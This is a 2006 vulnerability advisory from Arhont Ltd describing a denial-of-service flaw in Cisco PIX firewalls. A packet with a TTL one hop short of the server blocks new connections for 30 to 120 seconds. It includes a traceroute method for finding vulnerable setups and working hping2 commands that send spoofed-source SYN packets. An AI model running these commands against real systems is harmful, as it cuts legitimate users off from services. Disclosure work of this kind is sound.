Arhont Ltd - Information Security Arhont Advisory by: Konstantin V. Gavrilenko (http://www.arhont.com) http://www.hackingciscoexposed.com Arhont ref: arh200511-1 Advisory: Cisco PIX embryonic state machine TTL(n-1) DoS Class: design bug? Version: Tested on PIX535, PIX OS ver 6.3(4) Tested on PIX515E, PIX OS ver 7.0(4) Model Specific: Other versions might have the same bug DETAILS Further to the advisory from Arhont Information Security released on 22/11/2005 named Cisco PIX TCP Connection Prevention, I would like to report that it is possible to perform an additional DoS attack utilising the same flaw in the embryonic connection mechanism on the PIX, but from the outside interface. It is possible to prevent new communication establishment to a specific port on a server located behind the PIX firewall, when a permanent static mapping is applied between a local and a global ip address, similar to the Network setup diagram below. Network Setup Attacker ------ Internet ------ PIX ------ Router ------ Server By sending a legitimate packet and specifying TTL equal to n-1 of the destination value, it is possible to disable communication between the source and destination port pair for the duration of approximately 120 seconds on PIXOS version 6 and 30 seconds on PIXOS version 7. In order for the attack to succeed, an additional hop (router) should be present between the PIX and the server, that would timeout the packet returning the ICMP time exceeded in-transit. Such setups can be easily identified using the TCPTraceroute to the open port and returning repeating destination IP in the last two hops. e.g. TCPTraceroute 5 xxx.xxx.xxx.32 18.952 ms 19.396 ms 20.438 ms 6 xxx.xxx.xxx.7 19.667 ms 22.174 ms 20.629 ms 7 xxx.xxx.xxx.68 29.286 ms 21.401 ms 19.935 ms 8 xxx.xxx.xxx.100 108.143 ms 42.783 ms * 9 xxx.xxx.xxx.100 [open] 32.268 ms 26.037 ms 23.569 ms Although, it would take a lot of packets to disrupt the communication between the hosts completely, we assume that the attacker's aim is to prevent the communication to a specific service located on the machine behind the PIX firewall (e.g. HTTP/S, SMTP) and some other host on the Internet, whose source address can be spoofed. Depending on the bandwidth, it might take as little as 15 seconds to generate and send out 65535 packets with a custom source port. The attack can be performed using the interactive packet constructors such as hping, e.g. if you want to prevent new communication establishment between SOURCE_IP source port 31337 and TARGET_IP destination port 80, execute: arhontus / # hping2 -a $SOURCE_IP -S -c 1 -s 31337 -p 80 -t 8 $TARGET_IP if you want to prevent new communication establishment between SOURCE_IP port ranges 0-63535 and TARGET_IP destination port 80, execute: arhontus / # hping2 -a $SOURCE_IP -S -s 0 -p 80 --faster -t 8 $TARGET_IP The attack was tested on two PIX 535 firewalls with 1Gb of RAM each performing static permanent mapping and running in failover mode with PIXOS ver 6.3(4), and on a single PIX 515E with 64Mb of RAM running PIXOS ver 7.0(4) RISK FACTOR: Medium WORKAROUNDS: PSIRT response with workarounds to follow this disclosure COMMUNICATION HISTORY Issue discovered: 04/11/2005 PSIRT notified: 24/01/2006 Public disclosure: 07/03/2006 ADDITIONAL INFORMATION: *According to the Arhont Ltd. policy, all of the found vulnerabilities and security issues will be reported to the manufacturer at least 7 days before releasing them to the public domains (such as CERT and BUGTRAQ). If you would like to get more information about this issue, please do not hesitate to contact Arhont team on info@xxxxxxxxxx -- Respectfully, Konstantin V. Gavrilenko Arhont Ltd - Information Security web: http://www.arhont.com http://www.wi-foo.com e-mail: k.gavrilenko@xxxxxxxxxx tel: +44 (0) 870 44 31337 fax: +44 (0) 117 969 0141 PGP: Key ID - 0xE81824F4 PGP: Server - keyserver.pgp.com
